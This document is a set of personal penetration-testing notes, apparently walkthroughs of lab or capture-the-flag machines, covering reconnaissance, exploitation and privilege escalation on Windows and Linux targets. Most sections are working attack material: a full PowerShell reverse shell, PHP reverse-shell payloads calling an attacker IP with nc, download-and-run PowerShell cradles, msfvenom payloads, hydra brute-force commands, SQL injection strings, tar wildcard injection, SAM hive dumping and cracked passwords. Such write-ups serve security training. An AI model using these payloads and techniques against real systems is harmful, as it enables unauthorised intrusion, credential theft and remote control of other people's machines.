Owner 侯智晟 meowheckerouo@gamil.com [TOC] --- # 0x04 Windows - /Rejetto HTTP File Server(HTP) RCE /Excessive binary Permission/Unquoto Servicec PATH/ ## Reconnaissance nmap Script ``` #!/bin/sh echo " ################################################## # # # MeowHecker is a cat. # # # ################################################## " TARGET_IP=10.10.183.61; echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Common Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Defalut(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oN ./$TARGET_IP.nmap; echo "----------------------------------------------------------------------------------------------------"; echo "Starting ALL Port Scanning in background!"; sleep 20; nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; ``` ### Identifying Host Status  ### Probing Common Ports  ### Identifying Services & Operating System & NSE Scanning   ### Thorough Port Scanning (0~65535)  ### Information Disclosure  Potential User -> Hill Harper ## Discovery & Analysis of New Attack Surface ### Web Services ### Port 80 ``` / /img ``` ### Port:8080 Directory Exposure ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://$TARGET_IP:8080 ``` No result  -> login -> Home -> Search ### SMB Service ``` TARGET_IP=10.10.183.61; nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $TARGET_IP ```  Not Result ## Identifying Vulnerability ### Searching public vulnerablility Web Service esists Public vulnerability !  Analysis Attacke Script  It look like a template injection Attacke Core Concept ! ``` http://10.10.183.61:8080/?search=%00{.+exec|whoami.} ``` Try Another excellent Exploit (Success)   Anaylsis Exploit program  Start the HTTPserver /nc.exe  ## Exploitation ### Initial Access Run the exploit !  Obtain Initial Access ## Post-Exploitation  ``` powershell -c "Invoke-WebRequest -uri 10.4.42.63:53/PowerUp.ps1 -outfile ./PowerUp.ps1" ``` <!-- powershell -c "Invoke-WebRequest -uri 10.4.42.63:53/nc64.exe -outfile ./nc64.exe" nc64.exe -e cmd 10.4.42.63 4444 -->  ### PowerUp.ps1 Scanning Cmd TO Powershell! ``` powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.4.42.63', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush() }; $client.Close()" ``` Running Script ``` . ./PowerUp.ps1 Invoke-AllChecks ``` Generate reverse shell (service) ``` powershell -c "Invoke-WebRequest -uri 10.4.42.63:53/Program.exe -outfile ./Program.exe" ``` ### Bill password  ### Excessive Binary Permission (FAIL) ``` copy Program.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\" ``` icacls ASCService.exe icacls ASCService.exe /grant bill:F ``` Program C:\Program Files (x86)\IObit\Advanced SystemCare ASCService.exe ```   ### Unquoted service Path (Work) Require -> CanRestart Start Name Path Permission  Check Unquoto PATH  This PATH is writeable !  ``` icacls Program.exe /grant USER_NAME:F ```   ``` sc.exe stop AdvancedSystemCareService9 sc.exe start AdvancedSystemCareService9 ```  # 0x05 Windows - /Default Admin Credential/Template Injection to RCE/SeDebugPrivilege, SeImpersonatePrivilege ## Reconnaissance ``` #/bin/sh echo " ################################################## # # # MeowHecker is a cat. # # # ################################################## " TARGET_IP=10.10.129.40; echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Common Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Defalut(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oN ./$TARGET_IP.nmap; echo "----------------------------------------------------------------------------------------------------"; sleep 10; echo "Starting ALL Port Scanning in background!"; nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; ``` ### Identifying Host Status  Host is up! ### Probing Common Ports  ### Identifying Services & Operating System & NSE Scanning  ### Thorough Port Scanning (0~65535) ### Information Disclosure ## Discovery & Analysis of New Attack Surface ### Web Services #### Port 80 <!-- Directory Exposure -->  Directory Exposure No Directory accessable ! #### Port 8080   /assets  /error  /logout  Target Analysis  ### Network Service ## Identifying Vulnerability ### Week Authentication Login Panel Week Authentication -> Default Credential admin:admin  We obtain the Admin pennel ## Exploitation Find out the to upload the web shell or run the cmd connect back to our machine  Reverse Powershell https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 ```powershell= powershell iex (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:PORT/Binary');Invoke-PowerShellTcp -Reverse -IPAddress 10.4.42.63 -Port 443 ```   ## Post-Exploitation ### Privilege Escalation #### PowerUP.ps1 (Fail) ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/PowerUp.ps1','PowerUp.ps1')" ``` ``` . ./PowerUp.ps1 Invoke-AllChecks ```  #### Swithiig the shell to Metepreter ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev_mete_shell.exe ``` ``` msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0 ; set LPORT 80; run" ``` ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/rev_mete_shell.exe','rev_mete_shell.exe')" ```  ### Abuse Privilege ``` whoami /prive ```  Backup to User Folder ``` reg save hklm\sam C:\Users\bruce\sam.hive reg save hklm\system C:\Users\bruce\system.hive ```  Due to Target Not support Python -> Use meterpreter !  SAM hashdump  ### Crack Hash ``` john -format=NT --wordlist=rockyou.txt WINDOW_HASH.txt ```  Fail ### Seimpersonate & SeAssign Primary Key (FAIL) ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/RogueWinRM.exe','RogueWinRM.exe')" ``` ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/nc32.exe','nc32.exe')" ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/nc64.exe','nc64.exe')" ``` ./RogueWinRM.exe -p "./nc32.exe" -a "-e cmd.exe 10.4.42.63 4444" ```  ### SeDebugPrivilege, SeImpersonatePrivilege Require: Metepreter #### Load Module ``` load incognito ```  To check which tokens are available, ``` list_tokens -g ```  Use Token ``` impersonate_token "BUILTIN\Administrators" ``` Migrate the metepreter to Admin process  ``` migrate ADMIN_PROCESS ```   # 0x06 Windows - /Web-Bruce Force login/Path Traversal % Upload Shell(RCE)/Scheduled Task ## Reconnaissance ``` #/bin/sh echo " ################################################## # # # MeowHecker is a cat. # # # ################################################## " TARGET_IP=10.10.41.190; echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Common Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Defalut(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oN ./$TARGET_IP.nmap; echo "----------------------------------------------------------------------------------------------------"; sleep 10 echo "Starting ALL Port Scanning in background"; nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; ``` ### Identifying Host Status  Host is up ### Probing Common Ports  ### Identifying Services & Operating System & NSE Scanning  ### Thorough Port Scanning (0~65535)  ## Discovery & Analysis of New Attack Surface ### Web Services Directory Enumeration  Site Map  Information disclosure  ### Network Service ## Identifying Vulnerability ### Searching public vulnerablility   Anaysis Exploit Script -> Directory Traversal + Upload web Shell It seem require the authentication to upload the shell !  Upload Function  Shell Script   ### Manul Testing #### Authentication Defualt Credential admin / admin  /Account/login.aspx  /Account/password-retrieval.aspx    ``` admin ADMIN ``` Week Authentication mechanism ! ``` hydra -l "admin" -P rockyou.txt 10.10.41.190 http-post-form "/Account/login.aspx:__VIEWSTATE=KWC25fG61cg5gTrz%2BbqQqQOa8LS4QYOnFQJzqXBZClc8W9%2FeZPQOT2CAEHJwvrvsfQcNR2jljSXSexhxw37RisOHhVLKIuyuxiv0N6X%2BZu0p%2FcO9NAO37TaiwTKr56aPrl7c93%2F5RwqUJxi%2FcHXyOpikgZcoH%2FZMgT%2FVhTB9bPd7YIe4&__EVENTVALIDATION=XWWQT%2B1JCSNG2w3vwcVK%2FtdMO7dbrI64dv2IUBHX%2BpTrmWEpSlIoBnTUSsYzQeLpJsevsGGLKE8b9jsdkmGczmXxajojgLfWMYzkhvMO4H0HT8tKuq1roy1QGDsEwJTeets4xQ2d1CaGtnlkuf80RKYY9PD2Dws1GcRvNJ9xTHNo2mZm&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%85%A5" ```  ## Exploitation RCE ! ``` python3 47011.py -u admin -p 1qaz2wsx -t 10.10.41.190 -l 10.4.42.63:443 ```  ## Post-Exploitation ### PowerUP.ps1 ``` cd C:\Windows\Temp powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/PowerUp.ps1','PowerUp.ps1')" ``` ### Privilege! (FAIL)  ``` whoami /priv ```  ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev_mete_shell.exe ``` ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/rev_mete_shell.exe','rev_mete_shell.exe')" ```  ### Admin Credential (FAIL)  ``` administrator 4q6XvFES7Fdxs ``` xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.219.174 /u:administrator /p:'4q6XvFES7Fdxs!'   ``` rdesktop -u administrator -p 4q6XvFES7Fdxs! 10.10.219.174 ``` ### WinPAES https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/winPEASx64.exe','winPEASx64.exe')" ``` SystemInfo  ### Scheduler Task -> Allow us modify the binary !! Service inforamtion  Find out the binary allow us to run with administration ### Search Schedule log    Message.exe allow modify Replace Message.exe to Malcious revershell   Solved ! # 0x07 Ubuntu - /SQLI-SQLmap/Local Port Forwarding/webmie (CMS) - RCE (admin) ## Reconnaissance ### Identifying Host Status  ### Probing Common Ports  ### Identifying Services & Operating System & NSE Scanning  ### Thorough Port Scanning (0~65535)  ### Interesting Information None ## Discovery & Analysis Attack Surface **Web** 0x01 Identify WebService Technique - Language: PHP - FrameWork: ? - Version: ? 0x02 Exists Known Vulnerability ? Unknow 0x03 Start Burp Scanner & crawl the website 0x04 Exists Specialised web Scanner ? 0x05 SiteMap ### Network Service ## Identifying Vulnerability ### Manul Testing - Web Following the list https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology /Login Page  SQULI Testing ``` 'SELECT SLEEP(20) -- meowhecker ``` UserName ``` ' or 1=1 -- meowPadding (Work) ``` Redreict to http://10.10.238.118/portal.php  serach -> 123'  SQLi Detection ## Exploitation Using SQL Map to exploit SQLI vulnerability Dump the Vulnerabilte page reqeust   ``` ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 ```  Password ``` videogamer124 ``` ### Attempt login as Agent 47 via SSH ``` ssh agent47@$TARGET_IP ```  ## Post-Exploitation Investigate Socket ``` ss -tulpn ```  Exposure the service ``` ssh -L 10000:localhost:10000 agent47@$TARGET_IP ```    CMS NAME -> Webmin Version 1.580 **Privilege Escalation** ### Exploit kernel (FAIl)  ### CMS - webmin(1.580) (Success )   Fail Attempt anouther Exploit   # 0x07 SMB Information Leak/Brute Force Login webSite/Directory brute force-Hide Page/CMS-Remote File Include(RCE)/Crons jobs wild card injection. ## Reconnaissance ``` #/bin/sh echo " ################################################## # # # MeowHecker is a cat. # # # ################################################## " ATTACKER_IP=10.4.42.63; TARGET_IP=10.10.49.83; echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Common Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Defalut(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap echo "----------------------------------------------------------------------------------------------------"; sleep 10 echo "Starting ALL Port Scanning in background"; nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; searchsploit --nmap $TARGET_IP.Xmap; ``` ### Identifying Host Status  ### Probing Common Ports  ### Identifying Services & Operating System & NSE Scanning   ### Thorough Port Scanning (0~65535)  ### Interesting Information None ## Discovery & Analysis Attack Surface **Web** 0x01 Identify WebService Technique - Language: php - Applicaiton Name & Version - SquirrelMail - 1.4.23 - Cuppa(CMS) 0x02 Exists Known Vulnerability ?  (NotWork!) Requred UserName & Password ! CMS Cuppa Exists Remote file inclusion !  0x03 Exists Specialised web Scanner ? Unknow 0x04 Start Burp Scanner 0x05 Directory Brute-force  0x06 SiteMap ### P0P3 110 ``` nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port 110 $TARGET_IP ``` Burpforce login Attempt userName-> miles ``` hydra -l miles -P rockyou.txt -f $TARGET_IP pop3 -V ``` No Interesting Things  ### IMAP 143 No Interesting Things ### SMB Server List the SMB share folder ``` smbclient --no-pass -L //$TARGET_IP ```  Connect to Share folder ``` smbclient --no-pass //$TARGET_IP/anonymous ```  最近的一次系統故障導致各種密碼被更改。所有天網員工看到此資訊後都必須更改密碼。 ——麥爾斯‧戴森 -> info -> Weak Password ? ->UserName: milesdyson  milesdyson ## Identifying Vulnerability **Web** Following the list https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology Brute Force login Attemp Parameter ``` login_username=mewo&secretkey=mewo&js_autodetect_results=1&just_logged_in=1 ``` ERROR ``` hydra -l "milesdyson" -P log1.txt $TARGET_IP http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." ```  User:milesdyson Password:cyborg007haloterminator  SMB UserName / Password milesdyson )s{A&2Z=F^n_E.B` **Login SMB server ** ``` smbclient -U milesdyson //$TARGET_IP/milesdyson ``` Download Sesitive info  Page look like in deveopmenting ``` /45kra24zxs28v3yd ``` Exposure the Hide directory ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://$TARGET_IP/45kra24zxs28v3yd:80 ```  CMS: Cuppa Attempt Public exploit  ## Exploitation Exploit remote file include to RCE  PHP shell ``` <?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.4.42.63 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?> ``` ``` /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.42.63:53/PHPreverShell.php ``` ### Obtain the initial Shell   ## Post-Exploitation **Shell Stabilization**  **Privilege Escalation** echo "mkfifo /tmp/f; nc 10.4.42.63 443 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f" > /home/milesdyson/backups/backup.sh **Running LinPEAS**  **Checking crontab Configuration** `cat /etc/crontab`     ### Wild Cards Parameter Injection ``` echo '#!/bin/bash' > shell.sh echo '/bin/bash' >> shell.sh echo "meow1" > "--checkpoint=1" echo "meow1" > "--checkpoint-action=exec=sh ./shell.sh" ``` Another Ways ``` printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" ```  **Checkt SUID permisison**  No Result **Checkt cap_setuid**  No Result # 0x08 CentOS - /SQULI - joomla (CMS)/Jommla Penal to RCE/Sudo - yum ## Reconnaissance ### NMAP-Scanning ``` #/bin/sh echo " ################################################## # # # MeowHecker is a cat. # # # ################################################## " ATTACKER_IP=10.4.42.63; TARGET_IP=10.10.70.73; echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Common Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Defalut(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap echo "----------------------------------------------------------------------------------------------------"; sleep 10 echo "Starting ALL Port Scanning in background"; nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; searchsploit --nmap $TARGET_IP.Xmap; ``` **Host is UP ?**  Yes/NO: Yes **Probing Commod Ports**  **Identifying Services & Operating System & NSE Scanning**  **Thorough Port Scanning (0~65535)** ## Discovery & Analysis Attack Surface **Web** 0x01 Identify WebService Technique  - Language: PHP - Applicaiton Name & version - Joomla : 3.7.0 0x02 Exists Known Vulnerability? Yes/NO: Yes SQLI  0x03 Exists Specialized web Scanner? Yes/NO: Yes https://www.kali.org/tools/joomscan/ https://github.com/drego85/JoomlaScan Run Scanner Tools-1 ``` python2 joomlascan.py -u http://10.10.249.47/ -t 10\ ``` Admin Component  Component information  Tools-2 ``` apt install joomlascan joomlascan -u http://10.10.249.47/ ``` Joomla 3.7.0    0x04 Curl the website & Directory Brute-force 0x05 SiteMap 0x06 Analysis Target & interesting Things? **Network Service** ## Identifying Vulnerability **Web** Following the list https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology Analysis Public Exploit  ## Exploitation SQULI- SQLMAP  ``` sqlmap -u "http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ```  Exploit tools - 2 SQULI exploit Run joomblash.py to exploit the SLQ vulnerability   We Obtain admin User :jonah Password Hash :$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm ### HASH Crack  $2 -> look lick bcrypt ``` john -format=bcrypt --wordlist=rockyou.txt passwordHash.txt ```  ``` spiderman123 ``` Website login http://10.10.249.47/administrator/ jonah spiderman123  Upload PHP reverse Shell ``` <?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?> ```  We could attempt use template injection or find another way to upload the shell Search Public Exploit way     We obtain the Revershell !! ## Post-Exploitation **Shell Stabilization**  **Privilege Escalation** Linux Privilege Check List 0x01 Useful Binary ? ``` which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ```  0x02 Running LinPEAS wget http://10.17.1.166:53/linpeas.sh -O /tmp/linpeas.sh chmod +x linpeas.sh 0x03 Systems information  0x04 Network Information  0x04 PATH is Writable ? Attempt PATH Hijack -> Require Root Script run some cmd(Target)  0x05 Kernel Exploit 0x06 Scheduled/Cron Jobs - Script Permission(w) & Scirpt exists?. - Cron jobs contain wilcard.  0x06 Sudo & SUID & cap_setuid Vulnerabile Binary ? Sudo -l (jjameson)  SUID  Capability  LD_PRELOAD ? 0x07 NFS PRivilege? 0x08 If server have DB & web server check the configuration file (Default /var/www/html/   DB cridential ``` root nv5uz9r3ZEDzVjNu ```  Attempt use "n5uz9r3ZEDzVjNu" to switch user  Abuse Sudo Obtain the root shell !!  Solved! # 0x09 Ubuntu /PacketAnalysis/analysis Back door/Crack SHA-512 with salt/hack back/Suid -bash binary ## Forensics - Analysis the PCAP Analysis Pcap  ``` <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> ```    ``` whenevernoteartinstant. ```  ``` .!.<git clone https://github.com/NinjaJc01/ssh-backdoor ``` ## Analysis BackDoor Code Analysis main.go  Hard Code Hash   Attack Hash ``` ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed ``` Crack SHA-512 with salt (HASH CAT) ``` hashcat -m 1710 "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05" rockyou.txt ```  ## Hacking Back  Lookup the web application   Upload Page have been removed Attempting use Back Door to login  we will occur the issue about no negotiate with target ssh server, the reason is the OpenSSh server is not support ssh-ras algorithm. Adding the ssh-rsa algorithm ! ``` ssh james@10.10.131.203 -p 2222 -oHostKeyAlgorithms=+ssh-rsa ``` Attempting exploit sudo privilege to escalate the privilege.   we found the .suid_bash owner is root and the binary has been set the SUID bit. we can attempt to run it ``` .suid_pash -p ``` -p : let bash run with SUID bit  Solve ! # 0x10 Windows /SMB service share folder with web service/Upload ASPX web shell via smb service to RCE/Seimpersonation - PrintSpoofer ## Reconnaissance ### Nmap-Scanning ``` #/bin/sh echo " ################################################## # # # MeowHecker is a cat. # # # ################################################## " ATTACKER_IP=10.17.1.166; TARGET_IP=10.10.66.39; echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Common Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Defalut(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap echo "----------------------------------------------------------------------------------------------------"; sleep 10 echo "Starting ALL Port Scanning in background"; nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; searchsploit --nmap $TARGET_IP.Xmap; ``` **Host is UP ? ** Yes/NO:yes  **Probing Common Ports**  **Identifying Services & Operating System & NSE Scanning**   **Thorough Port Scanning (0~65535)** ## Discovery & Analysis Attack Surface ### Web 0x01 Identify WebService Technique - Language:ASP.NET - Applicaiton Name & Version -Microsoft ASP.NET Port:80/49663  0x02 Exists Known Vulnerability? Yes/NO:Unknow 0x03 Exists Specialised web Scanner? Yes/NO: No 0x04 Curl the websiet & Directory Brute-force Port:49663 ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.211.255:49663/ ``` 0x05 SiteMap 0x06 Anaysis Target & interesting Things ? ### SMB/Netbios 0x01 Enumerate Service ``` enum4linux -a 10.10.66.39 ```  Using scanner/smb/smb_version Module  SMB version: 3.1.1  SMB ``` TARGET_IP=10.10.223.79; nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $TARGET_IP ```    ``` Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk ``` 0x02 Exisits Public Exploit? YES/NO: NO ## Identifying Vulnerability **Web** Following the list https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology None Vulnerability ! ## Exploitation ms17_010_eternalblue (FAIL) ``` msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue ;set RHOST 10.10.34.125 ; set lhost tun0; run;' ```  Fail ### Crack encoder ``` Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk ``` https://www.asciitohex.com/ Base64 Decoding ``` Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$ ``` smbclient //$TARGET_IP/nt4wrksv -U Bob   沒想法了 嘗試後面的掃出來的port ``` nmap -sT -Pn -p 49663,49667,49669 -sV -sC -T4 10.10.211.255 ```    We concern that smb directory mapping to web directory If we write ASP shell to SMB server the web may execute the web shell  Generate ASPX web Shell ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=443 -f aspx > rev_shell.aspx ```  ## Post-Exploitation **Shell Stabilization** ### Privilege Escalation **Enumerate**  **Exploit** https://github.com/itm4n/PrintSpoofer Windows 10 and Server 2016/2019.  Usage ``` PrintSpoofer.exe -i -c cmd ``` # 0x11 Ubuntu - /Wordpress-brute force/wordpress panel to RCE/ pivoting/jenkins penal To RCE(ROOT) ## Reconnaissance TARGET_IP=10.10.174.127 ATTACKER_IP=$(ip addr show tun0 | awk '/inet / {print $2}' | cut -d '/' -f 1) ### Nmap-Scanning **Host is UP ?** Yes/NO:Yes  **Probing Common Ports**  **Identifying Services & Operating System & NSE Scanning**  OpenSSH 7.6p1 Ubuntu Apache httpd 2.4.29 **Thorough Port Scanning (0~65535)** ## Discovery & Analysis Attack Surface ### Web DNS setting -> 0x01 Identify Web Service Technique - Language:PHP - Applicaiton Name & Version - 'WordPress 5.4.2' -> /blog - - Port: 80 0x02 Exists Known Vulnerability? Yes/NO:Yes google ? (Identify the vulnerability is reliable !) Exploit - DB? GitHub ?  0x03 Exists Specialised web Scanner? Yes/NO:Yes https://github.com/wpscanteam/wpscan ``` wpscan --url $TARGET_IP/blog/ ```  -> 'WordPress 5.4.2' 0x04 Curl the website & Directory Brute-force  ``` http://10.10.174.127/blog/ http://10.10.174.127/wordpress/ http://10.10.174.127/javascript/ http://10.10.174.127/phpmyadmin/ ``` WordPress ``` gobuster dir -w /home/kali/Desktop/RedTools/wordpress.fuzz.txt -u http://$TARGET_IP:80/wordpress ``` 0x05 SiteMap 0x06 Analysis Target & interesting Things ? ### Network Service 0x01 Enumerate Service 0x02 Exisits Public Exploit? ## Identifying Vulnerability - Manual **Web** Following the list https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology ## Exploitation Word Press Bypass is possible  https://github.com/N4nj0/CVE-2020-35590 (Limit Auth bypass - fail) ``` ./wp-brute.py -c -u http://10.10.174.127/blog/ -H X-Forwarded-For -l admin -P rockyou.txt ``` Attempt using wpscan to login ``` wpscan --url $TARGET_IP/blog/ --passwords rockyou.txt --usernames admin --max-threads 50 ``` my2boys    ### Wordpress panel to Rce https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#panel-rce  ``` <?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?> ```   ``` http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php ``` Obtain the reverse Shell !  ## Post-Exploitation **Shell Stabilization**  ### Privilege Escalation **Enumerate** Due to we compromise the host by web shell, the first thing is enumerate the database credential.  ``` // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** MySQL database username */ define( 'DB_USER', 'wordpress' ); /** MySQL database password */ define( 'DB_PASSWORD', 'wordpress123' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); ```   ``` $P$BOFWK.UcwNR/tV/nZZvSA6j3bz/WIp/ ``` It look like a the panel of wordpress account ### Systems 0x01 Systems Information  0x02 The list of Useful Binary  0x03 Account Information If Target systems have web & Database Search -> Configuration Credential(Notice )  0x04 PATH is Writable ? Yes/NO:Yes  wget http://10.17.1.166:53/linpeas.sh -O /tmp/linpeas.sh chmod +x linpeas.sh 0x04 PATH is Writable ? Attempt PATH Hijack -> Require Root Script run some cmd(Target) 0x05 Kernel Exploit 0x06 Scheduled/Cron Jobs - Cron jobs contain wilcard? 0x06 Sudo 0x07 SUID & cap_setuid Vulnerabile Binary ? LD_PRELOAD ? 0x08 Other Server Be block by firewall ?  0x08 NFS PRivilege? check the configuration file (Default /var/www/html/ 0xff Running LinPEAS  **Exploit**   ``` aubreanna:bubb13guM!@#123 ```  ### Bypass Firewall via local port forwarding ``` ssh -N -L 8080:localhost:8080 